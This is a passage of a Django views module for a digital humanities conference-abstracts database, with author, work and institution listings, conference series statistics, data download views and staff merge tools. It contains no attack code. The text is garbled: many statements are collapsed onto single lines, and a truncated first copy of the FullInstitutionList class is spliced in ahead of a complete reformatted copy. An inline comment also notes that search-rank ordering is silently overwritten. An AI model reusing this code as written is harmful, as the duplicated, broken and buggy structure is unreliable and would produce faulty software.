result_set.filter(id=author_res.id) affiliation_res = filter_form["affiliation"] if affiliation_res is not None: result_set = result_set.filter( authorships__affiliations=affiliation_res ) institution_res = filter_form["institution"] if institution_res is not None: result_set = result_set.filter( authorships__affiliations__institution=institution_res ) country_res = filter_form["country"] if country_res is not None: result_set = result_set.filter( authorships__affiliations__institution__country=country_res ) 
            conference_res = filter_form["conference"]
            if conference_res is not None:
                result_set = result_set.filter(works__conference=conference_res)
            if filter_form["singleton"]:
                # "Singleton" authors appeared at exactly one conference.
                result_set = result_set.filter(n_conferences=1)
            name_res = filter_form["name"]
            if name_res != "":
                result_set = result_set.filter(appellations_index__icontains=name_res)
            first_name_res = filter_form["first_name"]
            if first_name_res != "":
                result_set = result_set.filter(
                    authorships__appellation__first_name__icontains=first_name_res
                )
            last_name_res = filter_form["last_name"]
            if last_name_res != "":
                result_set = result_set.filter(
                    authorships__appellation__last_name__icontains=last_name_res
                )
            # Newest affiliations
            newest_authorship = Authorship.objects.filter(
                author=OuterRef("pk")
            ).order_by("-work__conference__year")
            # Pull the author's most recent name/affiliation via correlated
            # subqueries so the template can render them without extra queries.
            annotated_authors = result_set.annotate(
                main_affiliation_department=Subquery(
                    newest_authorship.values("affiliations__department")[:1]
                ),
                main_affiliation_institution=Subquery(
                    newest_authorship.values("affiliations__institution__name")[:1]
                ),
                main_affiliation_institution_city=Subquery(
                    newest_authorship.values("affiliations__institution__city")[:1]
                ),
                main_affiliation_institution_state=Subquery(
                    newest_authorship.values(
                        "affiliations__institution__state_province_region"
                    )[:1]
                ),
                main_affiliation_institution_country=Subquery(
                    newest_authorship.values(
                        "affiliations__institution__country__pref_name"
                    )[:1]
                ),
                most_recent_first_name=Subquery(
                    newest_authorship.values("appellation__first_name")[:1]
                ),
                most_recent_last_name=Subquery(
                    newest_authorship.values("appellation__last_name")[:1]
                ),
                n_works=Count("authorships", distinct=True),
            )
            return annotated_authors
        else:
            messages.warning(
                self.request,
                "Query parameters not recognized. Check your URL and try again.",
            )
            return base_result_set

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context["author_filter_form"] = AuthorFilter(data=self.request.GET)
        context["available_authors_count"] = Author.objects.count()
        context["redirect_url"] = reverse("author_list")
        return context


def annotate_multiple_series(qs):
    """Annotate a ConferenceSeries queryset with per-series entry-status
    counts and completion percentages (complete/in progress/in review)."""
    return qs.annotate(
        n_conferences=Count("conferences", distinct=True),
        earliest_year=Min("conferences__year"),
        latest_year=Max("conferences__year"),
        n_complete=Count(
            "conferences", filter=Q(conferences__entry_status="c"), distinct=True
        ),
        n_in_progress=Count(
            "conferences", filter=Q(conferences__entry_status="i"), distinct=True
        ),
        n_in_review=Count(
            "conferences", filter=Q(conferences__entry_status="r"), distinct=True
        ),
        n_remaining=F("n_conferences")
        - F("n_complete")
        - F("n_in_progress")
        - F("n_in_review"),
        # Cast to float so the division isn't integer division in SQL.
        pct_complete=(
            Cast(F("n_complete"), FloatField()) / Cast(F("n_conferences"), FloatField())
        )
        * 100,
        pct_in_progress=(
            Cast(F("n_in_progress"), FloatField())
            / Cast(F("n_conferences"), FloatField())
        )
        * 100,
        pct_in_review=(
            Cast(F("n_in_review"), FloatField())
            / Cast(F("n_conferences"), FloatField())
        )
        * 100,
        pct_remaining=(
            Cast(F("n_remaining"), FloatField())
            / Cast(F("n_conferences"), FloatField())
        )
        * 100,
    ).order_by("title")


def annotate_single_series(qs):
    """Aggregate the same progress stats as annotate_multiple_series, but for
    one flat Conference queryset; returns a plain dict."""
    res = qs.aggregate(
        earliest_year=Min("year"),
        latest_year=Max("year"),
        n_conferences=Count("id", distinct=True),
        n_complete=Count("id", filter=Q(entry_status="c"), distinct=True),
        n_in_progress=Count("id", filter=Q(entry_status="i"), distinct=True),
        n_in_review=Count("id", filter=Q(entry_status="r"), distinct=True),
    )
    res["n_remaining"] = (
        res["n_conferences"]
        - res["n_complete"]
        - res["n_in_progress"]
        - res["n_in_review"]
    )
    # Guard against division by zero for an empty queryset.
    if res["n_conferences"] > 0:
        res["pct_complete"] = (res["n_complete"] / res["n_conferences"]) * 100
        res["pct_in_progress"] = (res["n_in_progress"] / res["n_conferences"]) * 100
        res["pct_in_review"] = (res["n_in_review"] / res["n_conferences"]) * 100
        res["pct_remaining"] = (res["n_remaining"] / res["n_conferences"]) * 100
    else:
        res["pct_complete"] = 0
        res["pct_in_progress"] = 0
        res["pct_in_review"] = 0
        res["pct_remaining"] = 0
    return res


def conference_series_qs():
    # Series with no conferences attached are excluded entirely.
    return annotate_multiple_series(
        ConferenceSeries.objects.exclude(conferences__isnull=True)
    )


class ConferenceSeriesList(ListView):
    context_object_name = "series_list"
    template_name = "conference_series_list.html"

    def get_queryset(self):
        base_result_set = conference_series_qs()
        return base_result_set

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        # Standalone conferences (no series) get their own summary card.
        sa_conf = Conference.objects.filter(series__isnull=True)
        context["standalone_conferences"] = annotate_single_series(sa_conf)
        context["standalone_conference_count"] = sa_conf.count()
        return context


class ConferenceSeriesDetail(DetailView):
    model = ConferenceSeries
    template_name = "conference_series_detail.html"
    context_object_name = "series"

    def get_member_conferences(self):
        return Conference.objects.filter(series_memberships__series=self.get_object())

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context["series_progress"] = annotate_single_series(
            self.get_member_conferences()
        )
        # Order member conferences by their number within *this* series.
        series_order_subquery = SeriesMembership.objects.filter(
            conference=OuterRef("pk"), series=self.get_object()
        ).order_by("number")
        context["conference_list"] = (
            self.get_member_conferences()
            .annotate(
                main_series=StringAgg(
                    "series_memberships__series__abbreviation",
                    delimiter=" / ",
                    distinct=True,
                ),
                n_works=Count("works", distinct=True),
                n_authors=Count("works__authors", distinct=True),
                series_order=Subquery(series_order_subquery.values("number")[:1]),
            )
            .order_by("series_order")
            .prefetch_related(
                "series_memberships",
                "series_memberships__series",
                "organizers",
                "country",
                "hosting_institutions",
                "hosting_institutions__country",
                "documents",
            )
        )
        context["series_list"] = conference_series_qs()
        return context


class
StandaloneList(View): template_name = "conference_series_detail.html" def get_standalone_list(self): qs = ( Conference.objects.filter(series__isnull=True) .annotate( main_series=StringAgg( "series_memberships__series__abbreviation", delimiter=" / ", distinct=True, ), n_works=Count("works", distinct=True), n_authors=Count("works__authors", distinct=True), ) .order_by("year", "short_title", "theme_title") .prefetch_related( "series_memberships", "series_memberships__series", "organizers", "country", "hosting_institutions", "hosting_institutions__country", "documents", ) ) return qs def get(self, request): faux_series = { "title": "Standalone Events", "notes": "Digital humanities events not belonging to a larger series, such symposia or workshops.", "n_conferences": self.get_standalone_list().count(), } context = { "conference_list": self.get_standalone_list(), "series": faux_series, "series_list": conference_series_qs(), "series_progress": annotate_single_series(self.get_standalone_list()), } return render(request, self.template_name, context) def home_view(request): conference_count = Conference.objects.count() years_count = Conference.objects.aggregate(year_range=Max("year") - Min("year"))[ "year_range" ] work_count = Work.objects.count() author_count = Author.objects.exclude(authorships__work__isnull=True).count() institution_count = Institution.objects.count() country_count = ( Country.objects.filter( Q(institutions__affiliations__asserted_by__work__isnull=False) | Q(institutions__conferences__isnull=False) | Q(conferences__isnull=False) ) .distinct() .count() ) context = { "site": { "conference_count": conference_count, "years_count": years_count, "work_count": work_count, "author_count": author_count, "institution_count": institution_count, "country_count": country_count, } } return render(request, "index.html", context) @user_is_staff @transaction.atomic def author_merge_view(request, author_id): author = get_object_or_404(Author, pk=author_id) if 
request.method == "GET": """ Initial load of the merge form displays all the authorships of the current author that will be affected """ context = {"merging": author, "author_merge_form": AuthorMergeForm} return render(request, "author_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = AuthorMergeForm(request.POST) if raw_form.is_valid(): target_author = raw_form.cleaned_data["into"] if author == target_author: """ If the user chooses the existing author, don't merge, but instead error out. """ messages.error( request, f"You cannot merge an author into themselves. Please select a different author.", ) return redirect("author_merge", author_id=author_id) else: old_author_string = str(author) merge_results = author.merge(target_author) target_author.user_last_updated = request.user target_author.save() messages.success( request, f"Author {old_author_string} has been merged into {target_author}, and the old author entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} authorships updated" ) return redirect("author_detail", author_id=target_author.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "author_merge.html", context) def field_required(field): if field.get_internal_type() in ("CharField", "TextField") and field.blank: return False if field.null: return False return True def download_data(request): data_dictionary = [] if request.user.is_authenticated: dt_config = settings.PRIVATE_DATA_TABLE_CONFIG zip_url = reverse("private_all_tables_download") else: dt_config = settings.PUBLIC_DATA_TABLE_CONFIG zip_url = reverse("public_all_tables_download") denormalized_url = reverse("works_download") denormalized_last_updated = datetime.fromtimestamp( getmtime(f"{settings.DATA_OUTPUT_PATH}/{settings.DENORMALIZED_WORKS_NAME}.zip") ) for m in dt_config["CONFIGURATION"]: model = 
attrgetter(m["model"])(models) if "manual_model_description" in m: model_description = m["manual_model_description"] else: try: model_description = model.model_description except: model_description = None all_model_fields = [ { "name": f.name, "relation": f.is_relation, "help_text": f.help_text, "related_model": str(f.related_model) .replace("<class 'abstracts.models.", "") .replace("'>", ""), "type": f.get_internal_type(), "required": field_required(f), } for f in model._meta.fields if not f.one_to_many and f.name not in m["exclude_fields"] ] if m.get("include_string", False): all_model_fields.append( { "name": "label", "relation": None, "help_text": "General label for this object", "related_model": None, "type": "CharField", "required": True, } ) data_dictionary.append( { "model": m["model"], "model_description": model_description, "csv_name": m["csv_name"], "fields": all_model_fields, } ) normalized_last_updated = datetime.fromtimestamp( getmtime(f"{settings.DATA_OUTPUT_PATH}/{dt_config['DATA_ZIP_NAME']}") ) context = { "zip_url": zip_url, "denormalized_url": denormalized_url, "denormalized_last_updated": denormalized_last_updated, "normalized_last_updated": normalized_last_updated, "data_dictionary": data_dictionary, "denormalized_data_dictionary": settings.DENORMALIZED_HEADERS, } return render(request, "downloads.html", context) def download_works_csv(request): target_zip = f"{settings.DATA_OUTPUT_PATH}/{settings.DENORMALIZED_WORKS_NAME}.zip" response = FileResponse(open(target_zip, "rb")) return response def public_download_all_tables(request): target_zip = f"{settings.DATA_OUTPUT_PATH}/{settings.PUBLIC_DATA_TABLE_CONFIG['DATA_ZIP_NAME']}" response = FileResponse(open(target_zip, "rb")) return response @login_required def private_download_all_tables(request): target_zip = f"{settings.DATA_OUTPUT_PATH}/{settings.PRIVATE_DATA_TABLE_CONFIG['DATA_ZIP_NAME']}" response = FileResponse(open(target_zip, "rb")) return response @login_required def WorkCreate(request): 
    # Create a work, optionally pre-bound to a conference via ?conference=<pk>.
    if request.method == "GET":
        if "conference" in request.GET:
            conf = get_object_or_404(Conference, pk=int(request.GET["conference"]))
            work_form = WorkForm(initial={"conference": conf.pk})
        else:
            work_form = WorkForm()
    if request.method == "POST":
        work_form = WorkForm(request.POST)
        if work_form.is_valid():
            new_work = work_form.save()
            new_work.user_last_updated = request.user
            new_work.save()
            messages.success(request, f"{new_work} created.")
            # Hand off directly to authorship editing for the new work.
            return redirect("work_edit_authorship", work_id=new_work.pk)
        else:
            for err in work_form.errors:
                messages.error(request, err)
    context = {"work_form": work_form}
    return render(request, "work_create.html", context)


@login_required
def WorkEdit(request, work_id):
    """Edit a work's core fields; invalid POSTs fall through and re-render."""
    work = get_object_or_404(Work, pk=work_id)
    if request.method == "POST":
        work_form = WorkForm(request.POST, instance=work)
        if work_form.is_valid():
            work.user_last_updated = request.user
            work_form.save()
            # NOTE(review): user-facing "sucessfully" typo — left byte-identical
            # here; fix alongside any template/test that asserts the message.
            messages.success(request, f'"{work.title}" sucessfully updated.')
            return redirect("work_detail", work_id=work.pk)
        else:
            for f, e in work_form.errors.items():
                messages.error(request, f"{f}: {e}")
    work_initial_data = model_to_dict(work)
    context = {"work_form": WorkForm(initial=work_initial_data), "work": work}
    return render(request, "work_edit.html", context)


@login_required
@transaction.atomic
def WorkEditAuthorship(request, work_id):
    """Edit the full authorship formset of a work: deletions, reordering,
    appellation/affiliation updates, and creation of brand-new authors."""
    work = get_object_or_404(Work, pk=work_id)
    authorships = work.authorships.all()
    AuthorshipWorkFormset = formset_factory(
        WorkAuthorshipForm, can_delete=True, extra=0
    )
    # Seed the formset from the current authorship rows.
    initial_data = []
    for authorship in authorships:
        base_data = {
            "author": authorship.author,
            "authorship_order": authorship.authorship_order,
            "first_name": authorship.appellation.first_name,
            "last_name": authorship.appellation.last_name,
            "affiliations": [aff for aff in authorship.affiliations.all()],
        }
        initial_data.append(base_data)
    if request.method == "GET":
        authorships_forms = AuthorshipWorkFormset(initial=initial_data)
    elif request.method == "POST":
        authorships_forms = AuthorshipWorkFormset(request.POST)
        if authorships_forms.is_valid():
            for d_form in authorships_forms.deleted_forms:
                d_form_data = d_form.cleaned_data
                attached_author = d_form_data["author"]
                Authorship.objects.filter(
                    work=work, author=d_form_data["author"]
                ).delete()
                # Refresh the author in DB to update appellations index
                attached_author.save()
            for aform in authorships_forms:
                if aform not in authorships_forms.deleted_forms:
                    aform_data = aform.cleaned_data
                    appellation = Appellation.objects.get_or_create(
                        first_name=aform_data["first_name"],
                        last_name=aform_data["last_name"],
                    )[0]
                    affiliations = aform_data["affiliations"]
                    authorship_order = aform_data["authorship_order"]
                    try:
                        # NOTE(review): despite the name, author_id holds an
                        # Author instance, not a pk.
                        if aform_data["author"] is None:
                            author_id = Author.objects.create()
                        else:
                            author_id = aform_data["author"]
                        auth = Authorship.objects.update_or_create(
                            work=work,
                            author=author_id,
                            defaults={
                                "authorship_order": authorship_order,
                                "appellation": appellation,
                                "user_last_updated": request.user,
                            },
                        )[0]
                        author_id.user_last_updated = request.user
                        author_id.save()
                    except IntegrityError as e:
                        messages.error(
                            request, f"{e}: Ensure authorship order numbers are unique"
                        )
                        return redirect("work_edit_authorship", work.pk)
                    # Replace (not append to) the authorship's affiliations.
                    auth.affiliations.clear()
                    if affiliations is not None:
                        auth.affiliations.set(affiliations)
            messages.success(
                request, f'"{work.title}" authorships successfully updated.'
            )
            if "start_new" in request.POST:
                # "Save and start new" jumps straight to creating the next
                # work in the same conference.
                return redirect(
                    f"{reverse('work_create')}?conference={work.conference.pk}"
                )
            return redirect("work_detail", work_id=work.pk)
        else:
            for error in authorships_forms.errors:
                messages.error(request, error)
    context = {
        "authorships_form": authorships_forms,
        "work": work,
        "affiliation_form": AffiliationEditForm,
    }
    return render(request, "work_edit_authorships.html", context)


@login_required
def AuthorInfoJSON(request, author_id):
    """Small JSON payload about an author, consumed by the editing UI."""
    if request.method == "GET":
        author = get_object_or_404(Author, pk=author_id)
        author_aff = Affiliation.objects.filter(asserted_by__author=author).distinct()
        author_dict = {
            "first_name": author.most_recent_appellation.first_name,
            "last_name": author.most_recent_appellation.last_name,
            "work_titles": [w.title for w in author.works.all()][:4],
            "works_count": author.works.count(),
        }
        if author_aff is not None:
            author_dict["affiliations"] = [
                {"name": str(aff), "id": aff.pk} for aff in author_aff
            ]
        return JsonResponse(author_dict)


@login_required
def AffiliationInfoJSON(request, affiliation_id):
    """JSON payload describing an affiliation and its institution."""
    if request.method == "GET":
        affiliation = get_object_or_404(Affiliation, pk=affiliation_id)
        affiliation_dict = {
            "institution": {
                "name": str(affiliation.institution),
                "id": affiliation.institution.id,
            }
        }
        if affiliation.department is not None:
            affiliation_dict["department"] = affiliation.department
        return JsonResponse(affiliation_dict)


class WorkDelete(LoginRequiredMixin, SuccessMessageMixin, DeleteView):
    model = Work
    template_name = "work_delete.html"
    extra_context = {"cancel_view": "work_list"}
    success_url = reverse_lazy("work_list")

    def delete(self, request, *args, **kwargs):
        messages.success(self.request, f"'{self.get_object().title}' deleted")
        return super().delete(request, *args, **kwargs)


class FullWorkList(ListView):
    """Paginated, filterable work listing with optional full-text search."""

    context_object_name = "work_list"
    template_name = "work_list.html"
    paginate_by = 10

    def get_queryset(self):
        base_result_set = Work.objects.all()
        raw_filter_form = WorkFilter(self.request.GET)
        if raw_filter_form.is_valid():
            result_set = base_result_set
            filter_form = raw_filter_form.cleaned_data
            work_type_res = filter_form["work_type"]
            if work_type_res is not None:
                result_set = result_set.filter(work_type=work_type_res)
            conference_res = filter_form["conference"]
            if conference_res is not None:
                result_set = result_set.filter(conference=conference_res)
            affiliation_res = filter_form["affiliation"]
            if len(affiliation_res) > 0:
                result_set = result_set.filter(
                    authorships__affiliations__in=affiliation_res
                ).distinct()
            institution_res = filter_form["institution"]
            if len(institution_res) > 0:
                result_set = result_set.filter(
                    authorships__affiliations__institution__in=institution_res
                ).distinct()
            author_res = filter_form["author"]
            if len(author_res) > 0:
                result_set = result_set.filter(authorships__author__in=author_res)
            keyword_res = filter_form["keywords"]
            if len(keyword_res) > 0:
                result_set = result_set.filter(keywords__in=keyword_res)
            topic_res = filter_form["topics"]
            if len(topic_res) > 0:
                result_set = result_set.filter(topics__in=topic_res)
            language_res = filter_form["languages"]
            if len(language_res) > 0:
                result_set = result_set.filter(languages__in=language_res)
            if filter_form["full_text_available"]:
                result_set = result_set.exclude(full_text="")
            if filter_form["full_text_viewable"]:
                # Viewable = text present AND a license permitting display.
                result_set = result_set.exclude(full_text="").filter(
                    full_text_license__isnull=False
                )
            text_res = filter_form["text"]
            if text_res != "":
                # Postgres full-text search, ranked by relevance.
                text_query = SearchQuery(text_res, search_type="websearch")
                result_set = (
                    result_set.filter(search_text=text_query)
                    .annotate(
                        rank=SearchRank(
                            F("search_text"),
                            text_query,
                        ),
                        # Does the search text show up only in the full text?
                        search_in_ft_only=ExpressionWrapper(
                            ~Q(title__icontains=text_res), output_field=BooleanField()
                        ),
                    )
                    .filter(rank__gt=0.1)
                    .order_by("-rank")
                )
                # NOTE(review): this "rank" value is overwritten a few lines
                # below by `order_res = filter_form["ordering"]`, so an empty
                # ordering param falls back to "year" and re-sorts the ranked
                # results — confirm whether rank ordering should win here.
                order_res = "rank"
            # To find the last name of the first author, we develop a subquery
            # that will pull the first authorship for a given work. We can then
            # call the appellation__last_name
            first_author_subquery = Authorship.objects.filter(
                work=OuterRef("pk")
            ).order_by("authorship_order")
            order_res = filter_form["ordering"]
            if order_res is None or order_res == "":
                order_res = "year"
            if order_res == "year":
                result_set = result_set.order_by("conference__year", "title")
            elif order_res == "-year":
                result_set = result_set.order_by("-conference__year", "title")
            elif order_res == "title":
                result_set = result_set.order_by("title")
            elif order_res == "-title":
                result_set = result_set.order_by("-title")
            elif order_res == "last_name":
                result_set = result_set.annotate(
                    first_author_last_name=Subquery(
                        first_author_subquery.values("appellation__last_name")[:1]
                    )
                ).order_by("first_author_last_name", "title")
            elif order_res == "-last_name":
                result_set = result_set.annotate(
                    first_author_last_name=Subquery(
                        first_author_subquery.values("appellation__last_name")[:1]
                    )
                ).order_by("-first_author_last_name", "title")
            return (
                result_set.select_related(
                    "conference", "work_type", "parent_session", "full_text_license"
                )
                .annotate(
                    main_series=StringAgg(
                        "conference__series_memberships__series__abbreviation",
                        delimiter=" / ",
                        distinct=True,
                    ),
                    main_institution=StringAgg(
                        "conference__hosting_institutions__name",
                        delimiter=" / ",
                        distinct=True,
                    ),
                )
                .prefetch_related(
                    Prefetch(
                        "conference",
                        queryset=Conference.objects.prefetch_related(
                            Prefetch(
                                "series_memberships",
                                queryset=SeriesMembership.objects.select_related(
                                    "series"
                                ),
                            ),
                            "organizers",
                        ),
                    ),
                    "session_papers",
                    Prefetch(
                        "authorships",
                        queryset=Authorship.objects.select_related(
                            "appellation", "author"
                        ),
                    ),
                    "keywords",
                    "topics",
                    "languages",
                )
            )
        else:
            for error in raw_filter_form.errors:
                messages.warning(self.request, error)
            return base_result_set

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        raw_filter_form = WorkFilter(self.request.GET)
        if raw_filter_form.is_valid():
            filter_form = raw_filter_form.cleaned_data
            conference_res =
filter_form["conference"] if conference_res is not None: conferences_data = ( Conference.objects.filter(id=conference_res.id) .annotate( n_works=Count("works", distinct=True), n_authors=Count("works__authors", distinct=True), main_series=StringAgg( "series_memberships__series__abbreviation", delimiter=" / ", distinct=True, ), ) .select_related("country") .prefetch_related( "organizers", "series_memberships", "series_memberships__series" ) .all() ) context["selected_conferences"] = conferences_data context["work_filter_form"] = WorkFilter(data=self.request.GET) context["available_works_count"] = Work.objects.count() context["filtered_works_count"] = self.get_queryset().count() context["redirect_url"] = reverse("work_list") return context class FullInstitutionList(LoginRequiredMixin, ListView): context_object_name = "institution_list" template_name = "full_institution_list.html" paginate_by = 10 def get_queryset(self): annotated_affiliations = Affiliation.objects.annotate( n_works=Count("asserted_by__work", distinct=True) ) result_set = ( Institution.objects.annotate( n_works=Count("affiliations__asserted_by__work", distinct=True) ) .prefetch_related( Prefetch("affiliations", annotated_affiliations), "country" ) .order_by("-n_works") ) if self.request.GET: raw_filter_form = FullInstitutionForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data result_set = result_set.annotate( n_conferences=Count( "affiliations__asserted_by__work__conference", distinct=True ) ) department_res = filter_form["department"] if department_res != "": result_set = result_set.filter( affiliations__department__icontains=department_res ) affiliation_res = filter_form["affiliation"] if affiliation_res is not None: result_set = result_set.filter(affiliations=affiliation_res) institution_res = filter_form["institution"] if institution_res is not None: result_set = result_set.filter(pk=institution_res.pk) country_res = filter_form["country"] if country_res 
class FullInstitutionList(LoginRequiredMixin, ListView):
    """
    Paginated listing of institutions ranked by the number of works asserted
    through their affiliations, optionally narrowed by FullInstitutionForm.
    """

    context_object_name = "institution_list"
    template_name = "full_institution_list.html"
    paginate_by = 10

    def get_queryset(self):
        """Build the annotated institution queryset, applying GET filters."""
        affiliations_with_counts = Affiliation.objects.annotate(
            n_works=Count("asserted_by__work", distinct=True)
        )
        qs = (
            Institution.objects.annotate(
                n_works=Count("affiliations__asserted_by__work", distinct=True)
            )
            .prefetch_related(
                Prefetch("affiliations", affiliations_with_counts), "country"
            )
            .order_by("-n_works")
        )
        # No query string: return the default ranking untouched.
        if not self.request.GET:
            return qs
        form = FullInstitutionForm(self.request.GET)
        if not form.is_valid():
            for field, err in form.errors.items():
                messages.error(self.request, f"{field}: {err}")
            return qs
        cleaned = form.cleaned_data
        # n_conferences is only needed when filters are in play (singleton).
        qs = qs.annotate(
            n_conferences=Count(
                "affiliations__asserted_by__work__conference", distinct=True
            )
        )
        if cleaned["department"] != "":
            qs = qs.filter(affiliations__department__icontains=cleaned["department"])
        if cleaned["affiliation"] is not None:
            qs = qs.filter(affiliations=cleaned["affiliation"])
        if cleaned["institution"] is not None:
            qs = qs.filter(pk=cleaned["institution"].pk)
        if cleaned["country"] is not None:
            qs = qs.filter(country=cleaned["country"])
        if cleaned["no_department"]:
            qs = qs.filter(affiliations__department="")
        if cleaned["conference"] is not None:
            qs = qs.filter(
                affiliations__asserted_by__work__conference=cleaned["conference"]
            ).distinct()
        if cleaned["singleton"]:
            qs = qs.filter(n_conferences=1)
        ordering = cleaned["ordering"]
        if ordering == "n_dsc":
            qs = qs.order_by("-n_works", "affiliations__institution__name")
        elif ordering == "n_asc":
            qs = qs.order_by("n_works", "affiliations__institution__name")
        elif ordering == "a":
            qs = qs.order_by("affiliations__institution__name")
        return qs

    def get_context_data(self, **kwargs):
        """Add the filter form and unfiltered/filtered counts to the context."""
        context = super().get_context_data(**kwargs)
        context["institution_filter_form"] = FullInstitutionForm(
            initial=self.request.GET
        )
        context["available_institutions_count"] = Institution.objects.count()
        context["filtered_institutions_count"] = self.get_queryset().count()
        context["redirect_url"] = reverse("full_institution_list")
        return context
class AuthorInstitutionList(FullInstitutionList):
    """Like FullInstitutionList, but ranks institutions by distinct authors."""

    template_name = "author_institution_list.html"

    def get_queryset(self):
        """Annotate author/conference counts and apply any submitted filters."""
        base_qs = Institution.objects.annotate(
            n_authors=Count("affiliations__asserted_by__author", distinct=True),
            n_conferences=Count(
                "affiliations__asserted_by__work__conference", distinct=True
            ),
        ).distinct()
        if not self.request.GET:
            # Otherwise default to sorting by n_dsc
            return base_qs.order_by("-n_authors").distinct()
        form = FullInstitutionForm(self.request.GET)
        if not form.is_valid():
            for field, err in form.errors.items():
                messages.error(self.request, f"{field}: {err}")
            # Fall back to the unfiltered base queryset on bad input.
            return base_qs.distinct()
        cleaned = form.cleaned_data
        qs = base_qs
        if cleaned["department"] != "":
            qs = qs.filter(affiliations__department__icontains=cleaned["department"])
        if cleaned["affiliation"] is not None:
            qs = qs.filter(affiliations=cleaned["affiliation"])
        if cleaned["institution"] is not None:
            qs = qs.filter(pk=cleaned["institution"].pk)
        if cleaned["conference"] is not None:
            qs = qs.filter(works__conference=cleaned["conference"])
        if cleaned["country"] is not None:
            qs = qs.filter(country=cleaned["country"])
        if cleaned["singleton"]:
            qs = qs.filter(n_conferences=1)
        if cleaned["no_department"]:
            qs = qs.filter(affiliations__department="")
        if cleaned["ordering"] == "n_dsc":
            qs = qs.order_by("-n_authors")
        elif cleaned["ordering"] == "n_asc":
            qs = qs.order_by("n_authors")
        elif cleaned["ordering"] == "a":
            qs = qs.order_by("affiliations__institution__name")
        return qs.distinct()

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context["redirect_url"] = reverse("author_institution_list")
        return context


class InstitutionEdit(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
    """Edit an institution, stamping the editing user on save."""

    model = Institution
    template_name = "generic_form.html"
    fields = ["name", "city", "state_province_region", "country"]
    extra_context = {
        "form_title": "Edit institution",
        "cancel_view": "full_institution_list",
        "merge_view": "institution_merge",
    }
    success_message = "%(name)s updated"
    success_url = reverse_lazy("full_institution_list")

    def form_valid(self, form):
        # Record which user last touched this record before returning.
        response = super().form_valid(form)
        self.object.user_last_updated = self.request.user
        self.object.save()
        return response
class InstitutionCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView):
    """Create an institution, stamping the creating user on the record."""

    model = Institution
    template_name = "generic_form.html"
    fields = ["name", "city", "state_province_region", "country"]
    extra_context = {
        "form_title": "Create institution",
        "cancel_view": "full_institution_list",
    }
    success_message = "%(name)s created"
    success_url = reverse_lazy("full_institution_list")

    def form_valid(self, form):
        # Record which user created this record before returning.
        response = super().form_valid(form)
        self.object.user_last_updated = self.request.user
        self.object.save()
        return response


@user_is_staff
@transaction.atomic
def institution_merge(request, institution_id):
    """
    Merge one institution into another chosen via InstitutionMergeForm.

    GET renders the confirmation form showing what will be affected; POST
    performs the merge, reassigning affiliations to the target and deleting
    the source institution. Staff-only; runs in a single transaction.
    """
    institution = get_object_or_404(Institution, pk=institution_id)
    context = {"merging": institution, "institution_merge_form": InstitutionMergeForm}
    if request.method == "GET":
        # Initial load of the merge form displays all the authors and works
        # associated with this institution.
        return render(request, "institution_merge.html", context)
    elif request.method == "POST":
        raw_form = InstitutionMergeForm(request.POST)
        if raw_form.is_valid():
            target_institution = raw_form.cleaned_data["into"]
            if institution == target_institution:
                # Merging a record into itself would simply delete it, so
                # refuse and send the user back to the form.
                messages.error(
                    request,
                    "You cannot merge an institution into itself. Please select a different institution.",
                )
                return redirect("institution_merge", institution_id=institution_id)
            else:
                old_institution_id = str(institution)
                merge_results = institution.merge(target_institution)
                target_institution.user_last_updated = request.user
                target_institution.save()
                # BUGFIX: the message previously began "Author ..." although
                # this view merges institutions, not authors.
                messages.success(
                    request,
                    f"Institution {old_institution_id} has been merged into {target_institution}, and the old institution entry has been deleted.",
                )
                messages.success(
                    request, f"{merge_results['update_results']} affiliations updated"
                )
                return redirect("institution_edit", pk=target_institution.pk)
        else:
            for error in raw_form.errors:
                messages.error(request, error)
            return render(request, "institution_merge.html", context)
@user_is_staff
@transaction.atomic
def institution_multi_merge(request):
    """
    Merge several source institutions into a single target institution.

    POST validates InstitutionMultiMergeForm, merges every selected source
    (excluding the target itself) into the target, then redirects to the
    target's edit page. Any other method just renders the form.
    """
    context = {"form": InstitutionMultiMergeForm}
    if request.method == "POST":
        submitted = InstitutionMultiMergeForm(request.POST)
        if submitted.is_valid():
            target_institution = submitted.cleaned_data["into"]
            # Never treat the target itself as a merge source.
            source_institutions = submitted.cleaned_data["sources"].exclude(
                pk=target_institution.pk
            )
            for source in source_institutions:
                source_label = str(source)
                merge_results = source.merge(target_institution)
                target_institution.user_last_updated = request.user
                target_institution.save()
                messages.success(
                    request,
                    f"Institution {source_label} has been merged into {target_institution}, and the old institution entry has been deleted.",
                )
                messages.success(
                    request, f"{merge_results['update_results']} institutions updated"
                )
            return redirect("institution_edit", pk=target_institution.pk)
        else:
            for error in submitted.errors:
                messages.error(request, error)
    return render(request, "institution_multi_merge.html", context)


class AffiliationEdit(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
    """Edit an affiliation (department within an institution)."""

    model = Affiliation
    template_name = "generic_form.html"
    form_class = AffiliationEditForm
    extra_context = {
        "form_title": "Edit affiliation",
        "cancel_view": "full_institution_list",
        "merge_view": "affiliation_merge",
    }
    success_message = "%(department)s updated"
    success_url = reverse_lazy("full_institution_list")
class AffiliationCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView):
    """Create an affiliation, optionally pre-filled from ?institution=<pk>."""

    model = Affiliation
    template_name = "generic_form.html"
    form_class = AffiliationEditForm
    extra_context = {
        "form_title": "Create affiliation",
        "cancel_view": "full_institution_list",
    }
    success_message = "%(department)s created"
    success_url = reverse_lazy("full_institution_list")

    def get_initial(self, **kwargs):
        # Seed the institution field from the query string when provided.
        super().get_initial(**kwargs)
        if "institution" in self.request.GET:
            self.initial = {"institution": int(self.request.GET["institution"])}
        return self.initial


@login_required
def ajax_affiliation_create(request):
    """Create (or fetch) an affiliation via AJAX; return its name and id as JSON."""
    affiliation, _created = Affiliation.objects.get_or_create(
        department=request.POST["department"],
        institution=Institution.objects.get(pk=int(request.POST["institution"])),
    )
